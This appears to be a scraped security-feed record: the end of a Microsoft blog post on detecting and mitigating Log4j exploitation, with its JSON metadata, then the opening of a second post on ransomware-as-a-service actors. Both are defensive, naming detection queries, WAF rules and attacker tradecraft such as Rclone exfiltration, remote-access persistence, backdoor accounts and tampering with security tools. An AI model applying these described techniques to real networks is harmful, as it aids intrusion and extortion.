Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log2Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n\n\n_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mssecure", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T15:51:15", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) 